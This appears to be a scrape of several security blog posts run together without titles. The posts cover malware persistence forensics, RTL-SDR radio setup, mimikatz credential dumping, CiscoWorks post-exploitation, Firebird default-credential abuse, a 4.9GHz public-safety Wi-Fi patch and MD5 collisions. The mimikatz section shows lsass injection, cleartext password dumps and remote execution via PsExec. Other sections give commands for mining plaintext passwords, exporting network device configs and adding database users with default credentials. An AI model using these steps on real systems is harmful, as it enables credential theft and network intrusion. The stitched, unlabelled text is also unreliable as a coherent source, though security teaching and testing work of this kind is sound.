09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll
09/13/2010  09:28 PM    <dir>          plugtmp
03/23/2012  01:43 PM    <dir>          VMwareDnD
03/23/2012  02:54 PM               104 pdracing.tmp
-SNIP-

Investigating Persistence

• Services
• Registry
• Scheduled Tasks
• Startup Directory

Examine Services

net start >> output.txt

C:\>net start
These Windows services are started:

   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Event Log
   FTP Publishing
   Help and Support
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   MSSQLSERVER
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Telephony
   Terminal Services
   VMware Tools Service
   WebClient
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Workstation
   World Wide Web Publishing

The command completed successfully.

psservice query -s start

tasklist /svc >> output.txt

C:\>tasklist /svc

Image Name                   PID Services
========================= ====== ============================================
System Idle Process            0 N/A
System                         4 N/A
smss.exe                     604 N/A
csrss.exe                    652 N/A
winlogon.exe                 676 N/A
services.exe                 720 Eventlog, PlugPlay
lsass.exe                    732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe                  892 DcomLaunch, TermService
svchost.exe                  960 RpcSs
svchost.exe                 1072 Browser, CryptSvc, Dhcp, dmserver,
                                 EventSystem, helpsvc, lanmanserver,
                                 lanmanworkstation, Netman, Nla, RasMan,
                                 Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TapiSrv, TrkWks, W32Time,
                                 winmgmt, wscsvc, wuauserv
svchost.exe                 1132 Dnscache
svchost.exe                 1272 LmHosts, RemoteRegistry
explorer.exe                1408 N/A
VMwareUser.exe              1648 N/A
ctfmon.exe                  1660 N/A
wracing.exe                 1680 N/A
sqlmangr.exe                1692 N/A
svchost.exe                 1808 WebClient
inetinfo.exe                1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe                1880 MSSQLSERVER
VMwareService.exe            128 VMTools
alg.exe                     1168 ALG
cmd.exe                     1928 N/A
firefox.exe                  380 N/A
notepad.exe                 1344 N/A
tasklist.exe                1820 N/A
wmiprvse.exe                1892 N/A

psservice config [service name] >> output.txt

C:\>psservice config webclient

PsService v2.24 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: WebClient
DISPLAY_NAME: WebClient
Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these fun
ctions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

        TYPE              : 10 WIN32_OWN_PROCESS
        START_TYPE        : 2  AUTO_START
        ERROR_CONTROL     : 1  NORMAL
        BINARY_PATH_NAME  : C:\WINDOWS\System32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP  : NetworkProvider
        TAG               : 0
        DEPENDENCIES      : MRxDAV
        SERVICE_START_NAME: NT AUTHORITY\LocalService

psservice config

Examine Registry Entries and the Startup Directory

autorunsc -l >> output.txt

C:\>autorunsc -l

Sysinternals Autoruns v10.06 - Autostart program viewer
Copyright (C) 2002-2010 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

-snip-

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
   putbginfo.bat.lnk
     C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\putbginfo.bat.lnk
     File not found: C:\TOOLS\bginfo\putbginfo.bat


HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   ctfmon.exe
     C:\WINDOWS\system32\ctfmon.exe
     CTF Loader
     Microsoft Corporation
     5.1.2600.5512
     c:\windows\system32\ctfmon.exe
     5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
     99cb7370f16773c8e2d0c86fe805ec638ab126e9 (SHA-1)
     5fb24fc7916a6e6b3be7d84cb1684215b266cd1495575c2e5672b8447932e5b1 (SHA-256)
   wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
    FirstRunDisabled            REG_DWORD       0x1
    AntiVirusDisableNotify      REG_DWORD       0x0
    FirewallDisableNotify       REG_DWORD       0x0
    UpdatesDisableNotify        REG_DWORD       0x0
    AntiVirusOverride           REG_DWORD       0x0
    FirewallOverride            REG_DWORD       0x0

Examine Scheduled Tasks

autorunsc -t >> output.txt

C:\Documents and Settings\Administrator>autorunsc -t

Sysinternals Autoruns v11.21 - Autostart program viewer
Copyright (C) 2002-2012 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-

Initial Analysis of the Results

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

Process Name      : wracing.exe
Process ID        : 1680
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-16:33:00, 3/23/2012

Recovery

• If you find your system is infected by the malware, first thing you want to do is to disconnect your system from the internet as quickly as possible to prevent additional malware from being placed on your system and to limit the potential data loss.
• Make a backup. Note that some malware will also infect any USB device which is plugged in. This means that inserting a USB hard drive to perform a backup may actually infect it with an active infection component.
• Turn off the system restore. If the malware infected any of the critical operating system areas, the system restore points may contain copies of the infection which you can inadvertently restore to operation if you recover your OS from an infected copy
  • My Computer-> Properties->click the System Restore tab-> Click to select the Turn off System Restore check box
• Using a known clean system, change all your passwords. A common target for malware are credentials, which can then be used by the bad guys to access your accounts, perform fraudulent activities, etc.
• Install and Scan your system with latest updated antivirus and anti-spyware software to clean the malware or spyware, be sure to configure the software to prompt you prior to taking action on any suspicious files found.
• Reboot your system and update all the antivirus signatures and again rescan your system your system with antivirus and spyware.
• If your system is still affected by the malware, then a running process may be infected. To solve this issue you need to live boot to a software CD such as BART PE (http://www.nu2.nu/pebuilder/ ) to prevent the process from running. Tools such as HIJACK THIS can be used to clean the system while the process is not running in order to remove the infection.

Food for Thought

Software Defined Radio

GNU Radio

Hardware

USRP

Realtek RTL2832U

• http://sdr.osmocom.org/trac/wiki/rtl-sdr
• http://www.reddit.com/r/RTLSDR/comments/s6ddo/rtlsdr_compatibility_list_v2_work_in_progress/
• http://www.reddit.com/r/RTLSDR/comments/rbqfz/rtlsdr_compatibility_list_work_in_progress_please/
• http://wiki.spench.net/wiki/RTL2832#Supported_devices

• http://www.reddit.com/r/RTLSDR/comments/rpq5w/list_of_online_sources_for_tuners_work_in/

Configuration

Making sure your adapter is registered

 root@bt:~# lsusb | grep -i RTL  
 Bus 001 Device 008: ID 0bda:2832 Realtek Semiconductor Corp. RTL2832U DVB-T  

Manual Labor

The build-gnuradio script

• build-gnuradio-bt: https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
• gnuradio patch to help gr-smartnet: https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch

root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
root@bt:~# mkdir patches
root@bt:~# cd patches
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch
root@bt:~# cd ..
root@bt:~# chmod +x build_gnuradio_bt
root@bt:~# ./build_gnuradio_bt

The really easy way

• http://www.opensecurityresearch.com/files/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
• https://docs.google.com/file/d/0B1_75_-JY9jveTg0eGRqNFJtbk0/edit?pli=1 (Added 6/18/2012)

md5sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
a603351e08318a963ee850c69acfcbb8 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

sha1sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
66eeb8eaace16f2af73b7d77be3c035fa2359f81 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

root@bt:~# tar -jxf /cdrom/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2 
root@bt:~# cd gnuradio_rtl-sdr_bt5r2_bundle_v0.1/
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# ./build-gnuradio-bt 

[+] Offline install -> Installing gnuradio + supporting libraries
[+] Removing potentially conflicting packages
[+] Installing precompiled binaries from /root/gnuradio_rtl-sdr_bt5r2_bundle_v0.1/packages
[+] Wrapping up install
[+] Copying util to ~/rtl_sdr-utils
[+] Offline installation Completed! Enjoy!

root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# cd ..
root@bt:~# rm -rf gnuradio_rtl-sdr_bt5r2_bundle_v0.1/

Using RTL-SDR

root@bt:~# rtl_test -t
Found 1 device(s):
  0:  Generic RTL2832U (e.g. hama nano)

Using device 0: Generic RTL2832U (e.g. hama nano)
Found Elonics E4000 tuner
Supported gain values (18): -1.0 1.5 4.0 6.5 9.0 11.5 14.0 16.5 19.0 21.5 24.0 29.0 34.0 42.0 43.0 45.0 47.0 49.0 
Benchmarking E4000 PLL...
[E4K] PLL not locked for 51000000 Hz!
[E4K] PLL not locked for 2219000000 Hz!
[E4K] PLL not locked for 1109000000 Hz!
[E4K] PLL not locked for 1237000000 Hz!
E4K range: 52 to 2218 MHz
E4K L-band gap: 1109 to 1237 MHz
root@bt:~# 

Multimode.py

Installation

root@bt:~# svn co https://www.cgran.org/svn/projects/multimode
A    multimode/trunk
A    multimode/trunk/multimode_helper.py
A    multimode/trunk/multimode.py
A    multimode/trunk/COPYING
A    multimode/trunk/multimode.grc
A    multimode/trunk/Makefile
A    multimode/trunk/README
Checked out revision 996.
root@bt:~# cd multimode/trunk/
root@bt:~/multimode/trunk# make install
mkdir -p /root/bin
cp multimode.py multimode_helper.py /root/bin
Please make sure your PYTHONPATH includes /root/bin
And also that PATH includes /root/bin
this will allow multimode to work correctly
root@bt:~/multimode/trunk# export PYTHONPATH=$PYTHONPATH:/root/bin
root@bt:~/multimode/trunk# export PATH=$PATH:/root/bin

Interface

root@bt:~/bin# ./multimode.py 

1. Controls (Top)
2. Spectrograph (Middle)
3. Panorama (Bottom)

Listening to FM Radio!

root@bt:~/bin# ./multimode.py --freq 100.3M --dmode=WFM

root@bt:~/bin# ./multimode.py --freq 162.550M

Listening to Local Law Enforcement!

root@bt:~/bin# ./multimode.py --freq 476.587M --ftune=5k

Other Notable Fun!

• GSM Sniffer! - Airprobe
• Trunked Radio! - gr-smartnet (More updated info here: https://github.com/bistromath/gr-smartnet). There has been a lot of activity on this front, be sure to check this reddit for the latest!

• http://sdr.osmocom.org/trac/wiki/rtl-sdr#KnownApps

Using the GNU Radio Companion

Creating a Spectrum Analyzer

Launching GRC

root@bt:~# gnuradio-companion

1. The development area (Main Area/Left pane): This is where you'll create your flow graph
2. Logging pane (Lower): Provides logging and debugging messages
3. Block (Right pane): Lists the different development blocks that will make up your flow graph and application

Creating a Signal Flow Graph

root@bt:~ # ./simple_test.py

Got tips for GNU Radio or RTL-SDR? See something I got wrong above? Speak up in the comments below!!

Download

• http://blog.gentilkiwi.com/mimikatz

1. The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
2. You need to run it as admin (need debug privs)
3. Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)

Use Cases

What the heck is WDigest?

Running mimikatz

• privilege::debug
• inject::process lsass.exe sekurlsa.dll
• @getLogonPasswords

Running locally (Windows 2008 R2 – 64-bit)

mimikatz.exe

C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # 

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # 

mimikatz # @getLogonPasswords

Authentification Id         : 0;126660
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : FS
        msv1_0 :        lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }      
        wdigest :       1qaz@WSX        
        tspkg :         1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication

Running Remotely (Windows 2003 – 32-bit)

net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo

C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  

C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 

C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz



mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id         : 0;184995
Package d'authentification  : NTLM
Utilisateur principal       : PowerAccnt
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
        wdigest :       j************************\  <-  Service account with Admin Privileges and suuuper long password   - Ouch


Authentification Id         : 0;62703
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
        wdigest :       ********************                                                        <- Admin account with suuuper long password    - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication

Cleanup

del \\169.254.73.91\admin$\system32\sekurlsa.dll

dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found

net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.

Final Thoughts

Got some tips of your own? Let us know in the comments below!!!

Overview

1. Identifying a CiscoWorks Server
2. Obtaining CiscoWorks Administrator Credentials
3. Interfacing with the CiscoWorks Web Interface
4. Interfacing with the CiscoWorks Command Line Interface
5. Dumping configs from CiscoWorks

Identifying The Host

1. Host naming scheme
   • \\CiscoWorksBox
   • \\CISCOWKS
   • \\NETMNG
2. Application Directory
   • C:\Program Files (x86)\CSCOpx
3. User accounts
   • causer (Ciscoworks anonymous access user)
     

     
     C:\ >net user
     
     User accounts for \\CiscoWorksDemoBox
     
     ----------------------------------------------------------
     casuser                  user                  user2
     user3
     The command completed successfully.
     
     

4. Services
   • These Windows services are started:

     
     C:\ >net start
     
     --SNIP--
        CiscoWorks ANI database engine
        CiscoWorks Daemon Manager
        CiscoWorks RME NG database engine
        CiscoWorks Tomcat Servlet Engine
        CiscoWorks Web Server
     
     

Identifying Ciscoworks Account Credentials

1. Dump the local Windows password hashes and crack them
   • Windows Credential Editor (WCE) by Amplia Security
   • hashdump a post-exploitation module in the Metasploit framework:
   • gsecdump by TrueSec
   • fgdump by fizzgig
2. Data mine the Cisco works box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful, network engineers are usually responsible for managing Ciscoworks and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a Ciscoworks tool) that disclosed the Cisco Works credentials in plain-text.
   • findstr /I /S /M pass c:\*
   • dir /a /s /b c:\*pass*

Interacting with Ciscoworks

Using the Ciscoworks Web Interface

CiscoWorks interface and options post-authentication

• http://hostname:1741
• https://hostname

C:\> netstat -ano | findstr 1741
  TCP    0.0.0.0:1741           0.0.0.0:0              LISTENING       5136

C:\ >netstat -ano | findstr 443
  TCP    0.0.0.0:443           0.0.0.0:0              LISTENING       5136

Using the Ciscoworks Command line Application

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli  

For detailed help on a command and it's arguments, run
cwcli  -help

Dumping Device Configs from CiscoWorks

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u  -p  -device %

SUMMARY
========
        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig

C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free

What is the Firebird Database?

Identifying Firebird Databases

Vulnerability scanners

• McAfee Vulnerability Manager (MVM): Firebird SQL Default Credentials Detected
• Nessus: Firebird Default Credentials

Port scan

 root@bt:~# nmap -sS -T4 -PN -p 3050 192.168.1.0/24

Firebird Database Tools

FlameRobin (Client)

 root@bt:~# apt-get install flamerobin

 root@bt:~# flamerobin

 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users.  You may now register new servers and databases.

gsec (DB MGMT Tool)

Interrogating the Database

Retrieve Remote Server Version

• Display name: Friendly name to call the host, I use the IP
• Hostname: Hostname or IP address
• Port Number: will usually be 3050, however this instance is running on another port.

Registering the Server so we can communicate with it

Adding/Changing Users

With FlameRobin

With gsec

    -di[splay]
       Display all rows from security.fdb
   -di[splay] name
       Display information only for user name
   -a[dd] name -pw password
       Add a user named user with a password of password.
   -mo[dify] name [options]
       Modify the account name, optionally as specified by options.
   -de[lete] name
       Delete user name from security.fdb
   -h[elp] or ?
       Displays gsec commands and syntax

 gsec -user sysdba -pass masterkey -add Tony -pw S3kR3tP4$$

 gsec -user sysdba -pass masterkey -mo  -pw 

Mitigation

 gsec -user sysdba -pass masterkey -mo sysdba -pw 

More Info

• http://www.firebirdsql.org/manual/qsg2-config.html
• http://www.ibphoenix.com/download/tools/admin
• http://www.crypton.co.uk/freetools.html

Run across this in your own adventures? Tell us about it in the comments below!

What is the Public Safety Spectrum?

Interacting with the Spectrum

About the 4.9GHz Driver Patch

Enabling 4.9GHz

 root@bt:~# iw reg set <VALUE>

Channel Widths

Installation

Download

• https://github.com/OpenSecurityResearch/public-safety/tree/master/4.9ghz

The Easy Way

 root@bt:~# git clone https://github.com/OpenSecurityResearch/public-safety
 root@bt:~# cd public-safety/4.9ghz/
 root@bt:~/public-safety/4.9ghz# chmod +x 49ghz_install.sh
 root@bt:~/public-safety/4.9ghz# ./49ghz_install.sh

Manual Installation

 root@bt:~# apt-get install libnl-dev libssl-dev python-m2crypto build-essential 

 root@bt:~# openssl genrsa -out key_for_regdb.priv.pem 2048 
 root@bt:~# openssl rsa -in key_for_regdb.priv.pem -out key_for_regdb.pub.pem -pubout -outform PEM

 root@bt:~# wget http://linuxwireless.org/download/wireless-regdb/wireless-regdb-2011.04.28.tar.bz2
 root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
 root@bt:~# cd wireless-regdb-2011.04.28
 root@bt:~/wireless-regdb-2011.04.28# make

 root@bt:~/wireless-regdb-2011.04.28# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/db-ReturnTrue.txt
 root@bt:~/wireless-regdb-2011.04.28# cp db-ReturnTrue.txt db.txt
 root@bt:~/wireless-regdb-2011.04.28# ./db2bin.py regulatory.bin db.txt ../key_for_regdb.priv.pem
 root@bt:~/wireless-regdb-2011.04.28# make install

 root@bt:~# wget http://linuxwireless.org/download/crda/crda-1.1.2.tar.bz2
 root@bt:~# tar -jxf crda-1.1.2.tar.bz2
 root@bt:~# cd crda-1.1.2
 root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem pubkeys/
 root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem /usr/lib/crda/pubkeys
 root@bt:~/crda-1.1.2# make
 root@bt:~/crda-1.1.2# make install

 root@bt:~#  wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-1.tar.bz2
 root@bt:~# tar -jxf compat-wireless-3.3-1.tar.bz2
 root@bt:~# ln -s /usr/src/linux /lib/modules/`uname -r`/build
 root@bt:~# cd compat-wireless-3.3-1

 root@bt:~/compat-wireless-3.3-1# sudo scripts/wlunload.sh
 root@bt:~/compat-wireless-3.3-1# sudo modprobe -r b43 ath5k ath iwlwifi iwlagn mac80211 cfg80211

 root@bt:~/compat-wireless-3.3-1# scripts/driver-select ath5k

 root@bt:~/compat-wireless-3.3-1# wget http://www.backtrack-linux.org/2.6.39.patches.tar
 root@bt:~/compat-wireless-3.3-1# tar -xf 2.6.39.patches.tar
 root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
 root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211.compat08082009.wl_frag+ack_v1.patch
 root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/zd1211rw-2.6.28.patch
 root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/ipw2200-inject.2.6.36.patch

 root@bt:~/compat-wireless-3.3-1# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch
 root@bt:~/compat-wireless-3.3-1# patch -p1 < compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch

 root@bt:~/compat-wireless-3.3-1# make
 root@bt:~/compat-wireless-3.3-1# make install
 root@bt:~/compat-wireless-3.3-1# cd ..

Updating Kismet

 root@bt:~# dpkg -r kismet

 root@bt:~# git clone https://www.kismetwireless.net/kismet.git
 root@bt:~# cd kismet
 root@bt:~/kismet# ./configure
 root@bt:~/kismet# make dep
 root@bt:~/kismet# make
 root@bt:~/kismet# make install

 channellist=ps5mhz:4920-4990-5-.5
 channellist=ps10mhz:4920-4990-10-.5
 channellist=ps20mhz:4920-4990-20-.5

 root@bt:~# modprobe ath5k default_bwmode=2
 root@bt:~# iw dev wlan1 interface add mon0 type monitor
 root@bt:~# ifconfig mon0 up
 root@bt:~# iwconfig mon0 freq 4.920G

Is it Working?

Want to learn more?

1. Finding a good USB hub
2. Getting a copy of dd
3. Determining the drive mapping
4. Executing the foo

Finding a good USB hub

Number of ports

USB hub speed

Spacing between ports

Source: http://techdadreview.com/wp-content/uploads/2011/09/USB-flash-drives.jpg

Source: Amazon product page

Source: Belkin F5U021 product page

Power requirements

Reviews

Lights on each port

1. The USB port is functioning
2. The USB stick is functioning
3. The USB stick is seated properly
4. Data is being written to the stick

Getting a copy of dd

Determining the drive mapping

Monitoring/var/log/messages

root@box:~# tail –f /var/log/messages
Jul  1 16:16:59 DVORAK kernel: [174268.742086] usb 1-1: new high-speed USB device number 5 using ehci_hcd
Jul  1 16:17:00 DVORAK kernel: [174269.149525] scsi6 : usb-storage 1-1:1.0
Jul  1 16:17:01 DVORAK kernel: [174270.252811] scsi 6:0:0:0: Direct-Access     Kingston DataTraveler G3  PMAP PQ: 0 ANSI: 0 CCS
Jul  1 16:17:01 DVORAK kernel: [174270.260034] sd 6:0:0:0: Attached scsi generic sg2 type 0
Jul  1 16:17:01 DVORAK kernel: [174270.779011] sd 6:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
Jul  1 16:17:01 DVORAK kernel: [174270.786126] sd 6:0:0:0: [sdb] Write Protect is off
Jul  1 16:17:02 DVORAK kernel: [174270.834954]  sdb: sdb1
Jul  1 16:17:02 DVORAK kernel: [174270.860634] sd 6:0:0:0: [sdb] Attached SCSI removable disk

dmesg - print or control kernel messages

[  981.231497] Initializing USB Mass Storage driver...
[  981.231586] scsi3 : usb-storage 1-1:1.0
[  981.231792] usbcore: registered new interface driver usb-storage
[  981.231794] USB Mass Storage support registered.
[  982.235921] scsi 3:0:0:0: Direct-Access     Kingston DataTraveler G3  PMAP PQ: 0 ANSI: 0 CCS
[  982.238374] sd 3:0:0:0: Attached scsi generic sg2 type 0
[  982.248017] sd 3:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
[  982.252239] sd 3:0:0:0: [sdb] Write Protect is off
[  982.252243] sd 3:0:0:0: [sdb] Mode Sense: 23 00 00 00
[  982.256745] sd 3:0:0:0: [sdb] No Caching mode page present
[  982.256749] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[  982.276716] sd 3:0:0:0: [sdb] No Caching mode page present
[  982.276719] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[  982.278560]  sdb: sdb1
[  982.291142] sd 3:0:0:0: [sdb] No Caching mode page present
[  982.291145] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[  982.291148] sd 3:0:0:0: [sdb] Attached SCSI removable disk

fdisk –l– partition table manipulator and viewer

 Disk /dev/sdb: 4007 MB, 4007264256 bytes
74 heads, 10 sectors/track, 10576 cylinders
Units = cylinders of 740 * 512 = 378880 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *          11       10577     3909312    b  W95 FAT32

Executing the foo

 root@box:~# dd if=/dev/sdf |pv| tee >(dd of=/dev/sdd bs=16M) | dd of=/dev/sde bs=16M

 root@box:~# dd if=/dev/sdd |pv| tee >(dd of=/dev/sde bs=16M) >(dd of=/dev/sdf bs=16M) >(dd of=/dev/sdg bs=16M) | dd of=/dev/sdh bs=16M

Performance

Overall results

Hash Collision

pmedina@forensic:~$ wc -c prg1 prg2
 9054 prg1
 9054 prg2
18108 total
pmedina@forensic:~$ md5sum prg1 prg2
850d1dc3d24f0ea753a7ee1d5d8bbea9  prg1
850d1dc3d24f0ea753a7ee1d5d8bbea9  prg2

pmedina@forensic:~$ ./prg1
Let me see your identification.
pmedina@forensic:~$ ./prg2
These aren't the droids you're looking for

Detecting Hash Collisions

pmedina@forensic:~$ sha1sum prg1 prg2
a246766fc497e4d6ed92c43a22ee558b3415946a  prg1
b9c22ad10b61009193aa8b312c6ec88f44323119  prg2

Hashmap'ing a hash database

